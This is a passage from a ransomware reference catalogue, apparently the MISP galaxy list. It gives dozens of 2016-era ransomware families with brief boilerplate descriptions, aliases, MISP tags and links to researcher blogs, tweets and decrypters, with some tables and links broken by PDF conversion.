It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files don’t actually get encrypted, their names get changed using this formula: [number][.crypter]

The tag is: `misp-galaxy:ransomware="RenLocker Ransomware (FAKE)"

Table 5136. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

Thanksgiving Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Thanksgiving Ransomware"

Table 5137. Table References

<table>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html">https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/BleepinComputer/status/801486420368093184">https://twitter.com/BleepinComputer/status/801486420368093184</a></td>
</tr>
</tbody>
</table>

CockBlocker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="CockBlocker Ransomware"

Table 5138. Table References

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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html</a></td>
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<td><a href="https://twitter.com/jiriatvirlab/status/801910919739674624">https://twitter.com/jiriatvirlab/status/801910919739674624</a></td>
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</tbody>
</table>

Lomix Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on the idiotic open-source ransomware
called CryptoWire

The tag is: `misp-galaxy:ransomware="Lomix Ransomware"`

Table 5139. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html</a></td>
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<tr>
<td><a href="https://twitter.com/siri">https://twitter.com/siri</a>_ urz/status/801815087082274816</td>
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</table>

OzozaLocker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..  

https://3.bp.blogspot.com/-jubfYRaRmw/WDaOyZkKAAI/AAAAAAAACQE/E63a4FnaOflACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png

The tag is: `misp-galaxy:ransomware="OzozaLocker Ransomware"`

Table 5140. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/ozoza">https://id-ransomware.blogspot.co.il/2016/11/ozoza</a> locker-ransomware.html</td>
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<td><a href="https://decrypter.emsisoft.com/ozoza">https://decrypter.emsisoft.com/ozoza</a> locker</td>
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<td><a href="https://twitter.com/malwrhunterteam/status/801503401867673603">https://twitter.com/malwrhunterteam/status/801503401867673603</a></td>
</tr>
</tbody>
</table>

Crypute Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Crypute Ransomware"`

Crypute Ransomware is also known as:

• m0on Ransomware

Table 5141. Table References

<table>
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<tbody>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html">https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html</a></td>
</tr>
</tbody>
</table>

NMoreira Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email
spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="NMoreira Ransomware"

NMoreira Ransomware is also known as:

- Fake Maktub Ransomware

**Table 5142. Table References**

<table>
<thead>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html</a></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html</a></td>
</tr>
</tbody>
</table>

**VindowsLocker Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom amount is 349.99$ and the hacker seems to be from India. He disguises himself as Microsoft Support.

The tag is: misp-galaxy:ransomware="VindowsLocker Ransomware"

**Table 5143. Table References**

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html</a></td>
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<td><a href="https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3bjw5m3sw84k8hlph">https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3bjw5m3sw84k8hlph</a></td>
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<td><a href="https://rol.im/VindowsUnlocker.zip">https://rol.im/VindowsUnlocker.zip</a></td>
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<td><a href="https://twitter.com/JakubKroustek/status/800729944112427008">https://twitter.com/JakubKroustek/status/800729944112427008</a></td>
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</tbody>
</table>

**Donald Trump 2 Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Here is the original ransomware under this name: http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

The tag is: misp-galaxy:ransomware="Donald Trump 2 Ransomware"

**Table 5144. Table References**

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<tr>
<td><a href="http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html">http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html</a></td>
</tr>
</tbody>
</table>
**Nagini Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Looks for C:\Temp\voldemort.horcrux

The tag is: `misp-galaxy:ransomware="Nagini Ransomware"`

Nagini Ransomware is also known as:

- Voldemort Ransomware

**Table 5145. Table References**

<table>
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<tr>
<td><a href="http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html">http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html</a></td>
</tr>
</tbody>
</table>

**ShellLocker Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="ShellLocker Ransomware"`

*Table 5146. Table References*

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html</a></td>
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</tbody>
</table>

**Chip Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Chip Ransomware"`

Chip Ransomware is also known as:

- ChipLocker Ransomware
Dharma Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS > Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant

The tag is: \textit{misp-galaxy:ransomware}="Dharma Ransomware"

Table 5148. Table References

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<td><a href="https://twitter.com/GrujaRS/status/1072139616910757888">https://twitter.com/GrujaRS/status/1072139616910757888</a></td>
</tr>
</tbody>
</table>
Angela Merkel Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="Angela Merkel Ransomware"

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<th>Table 5149. Table References</th>
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<td>Links</td>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/798268218364358656">https://twitter.com/malwrhunterteam/status/798268218364358656</a></td>
</tr>
</tbody>
</table>

CryptoLuck Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="CryptoLuck Ransomware"

CryptoLuck Ransomware is also known as:

- YafunnLocker

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<th>Table 5150. Table References</th>
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<tr>
<td>Links</td>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html</a></td>
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<td><a href="https://twitter.com/malwareforme/status/798258032115322880">https://twitter.com/malwareforme/status/798258032115322880</a></td>
</tr>
</tbody>
</table>

Crypton Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="Crypton Ransomware"

Crypton Ransomware is also known as:

- Nemesis
Table 5151. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://decrypter.emsisoft.com/crypton">https://decrypter.emsisoft.com/crypton</a></td>
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<tr>
<td><a href="https://twitter.com/JakubKroustek/status/82935344632825856">https://twitter.com/JakubKroustek/status/82935344632825856</a></td>
</tr>
</tbody>
</table>

Karma Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. pretends to be a Windows optimization program called Windows-TuneUp

The tag is: misp-galaxy:ransomware="Karma Ransomware"

Table 5152. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html</a></td>
</tr>
</tbody>
</table>

WickedLocker HT Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="WickedLocker HT Ransomware"

Table 5153. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html</a></td>
</tr>
</tbody>
</table>
**PClock3 Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoLocker Copycat

The tag is: *misp-galaxy:ransomware="PClock3 Ransomware"*

PClock3 Ransomware is also known as:

- PClock SuppTeam Ransomware
- WinPlock
- CryptoLocker clone

*Table 5154. Table References*

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html">https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html</a></td>
</tr>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
</tbody>
</table>

**Kolobo Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="Kolobo Ransomware"*

Kolobo Ransomware is also known as:

- Kolobochev Ransomware

*Table 5155. Table References*

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<tr>
<td><a href="https://www.ransomware.wiki/tag/kolobo/">https://www.ransomware.wiki/tag/kolobo/</a></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html</a></td>
</tr>
</tbody>
</table>
PaySafeGen (German) Ransomware

This is most likely to affect German speaking users, since the note is written in German. Mostly affects users in German speaking countries. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="PaySafeGen (German) Ransomware"

PaySafeGen (German) Ransomware is also known as:

- Paysafecard Generator 2016
- PaySafeCard
- PaySafeGen

Table 5156. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/JakubKroustek/status/796083768155078656">https://twitter.com/JakubKroustek/status/796083768155078656</a></td>
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</table>

Telecrypt Ransomware

This is most likely to affect Russian speaking users, since the note is written in Russian. Therefore, residents of Russian speaking country are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransomware's authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via Russian payment services Qiwi or Yandex.Money ). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt will generate a random string to encrypt with that is between 10-20 length and only contain the letters vo,pr,bm,xu,zt,dq.

The tag is: `misp-galaxy:ransomware="Telecrypt Ransomware"

Table 5157. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html</a></td>
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<td><a href="http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked">http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked</a></td>
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<td><a href="https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3">https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3</a></td>
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<tr>
<td><a href="https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/">https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/</a></td>
</tr>
</tbody>
</table>
CerberTear Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="CerberTear Ransomware"`

Table 5158. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html</a></td>
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<td><a href="https://twitter.com/struppigel/status/795630452128227333">https://twitter.com/struppigel/status/795630452128227333</a></td>
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FuckSociety Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Hidden Tear >> APT Ransomware + HYPERLINK "https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html" "_blank" RemindMe > FuckSociety

The tag is: `misp-galaxy:ransomware="FuckSociety Ransomware"`

Table 5159. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html</a></td>
</tr>
</tbody>
</table>

PayDOS Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Batch file; Passcode: AES1014DW256 or RSA1014DJW2048

The tag is: `misp-galaxy:ransomware="PayDOS Ransomware"

PayDOS Ransomware is also known as:

- Serpent Ransomware

Table 5160. Table References
**zScreenLocker Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="zScreenLocker Ransomware"`

**Gremit Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Gremit Ransomware"`
Hollycrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="Hollycrypt Ransomware"

Table 5163. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>

BTCLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="BTCLocker Ransomware"

BTCLocker Ransomware is also known as:

- BTC Ransomware

Table 5164. Table References

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<tr>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

Kangaroo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda

The tag is: *misp-galaxy:ransomware*="Kangaroo Ransomware"

Table 5165. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html</a></td>
</tr>
</tbody>
</table>
**DummyEncrypter Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="DummyEncrypter Ransomware"`

**Encryptss77 Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

Encryptss77 Ransomware is also known as:

- SFX Monster Ransomware

**WinRarer Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="WinRarer Ransomware"`
Russian Globe Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"Russian Globe Ransomware"

Table 5169. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html</a></td>
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ZeroCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"ZeroCrypt Ransomware"

Table 5170. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html</a></td>
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</table>

RotorCrypt(RotoCrypt, Tar) Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"RotorCrypt(RotoCrypt, Tar) Ransomware"

RotorCrypt(RotoCrypt, Tar) Ransomware is also known as:

- RotorCrypt
- RotoCrypt
- Tar Ransomware

Table 5171. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>
Ishtar Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Ishtar Ransomware"

Table 5172. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html</a></td>
</tr>
</tbody>
</table>

MasterBuster Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="MasterBuster Ransomware"

Table 5173. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/struppigel/status/791943837874651136">https://twitter.com/struppigel/status/791943837874651136</a></td>
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JackPot Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="JackPot Ransomware"

JackPot Ransomware is also known as:

- Jack.Pot Ransomware

Table 5174. Table References
ONGX Ransomeware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Georgian ransomware

The tag is: *misp-galaxy:ransomware="ONGX Ransomeware"

IFN643 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="IFN643 Ransomware"

Alcatraz Locker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office,
Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Alcatraz Locker Ransomware"

**Table 5177. Table References**

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<td><a href="https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html</a></td>
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<td><a href="https://twitter.com/PolarToffee/status/792796055020642304">https://twitter.com/PolarToffee/status/792796055020642304</a></td>
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**Esmeralda Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Esmeralda Ransomware"

**EncrypTile Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="EncrypTile Ransomware"

**Table 5178. Table References**

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<td><a href="https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html</a></td>
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<td><a href="https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/">https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/</a></td>
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</table>

**Fileice Ransomware Survey Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of how the hacker tricks the user
using the survey method. The hacker definitely has a sense of humor: 

The tag is: misp-galaxy:ransomware="Fileice Ransomware Survey Ransomware"

**CryptoWire Ransomeware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoWire Ransomeware"

**Hucky Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on Locky

The tag is: misp-galaxy:ransomware="Hucky Ransomware"

Hucky Ransomware is also known as:

- Hungarian Locky Ransomware

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Winnix Cryptor Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="Winnix Cryptor Ransomware"

Table 5183. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/PolarToffee/status/811940037638111232">https://twitter.com/PolarToffee/status/811940037638111232</a></td>
</tr>
</tbody>
</table>

AngryDuck Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Demands 10 BTC

The tag is: *misp-galaxy:ransomware*="AngryDuck Ransomware"

Table 5184. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/demonslay335/status/790334746488365057">https://twitter.com/demonslay335/status/790334746488365057</a></td>
</tr>
</tbody>
</table>

Lock93 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="Lock93 Ransomware"

Table 5185. Table References

| Links |
ASN1 Encoder Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="ASN1 Encoder Ransomware"`

Table 5186. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html</a></td>
</tr>
</tbody>
</table>

Click Me Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker tries to get the user to play a game and when the user clicks the button, there is no game, just 20 pictures in a .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxl/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif

The tag is: `misp-galaxy:ransomware="Click Me Ransomware"`

Table 5187. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=Xe30kV4ip8w">https://www.youtube.com/watch?v=Xe30kV4ip8w</a></td>
</tr>
</tbody>
</table>

AiraCrop Ransomware

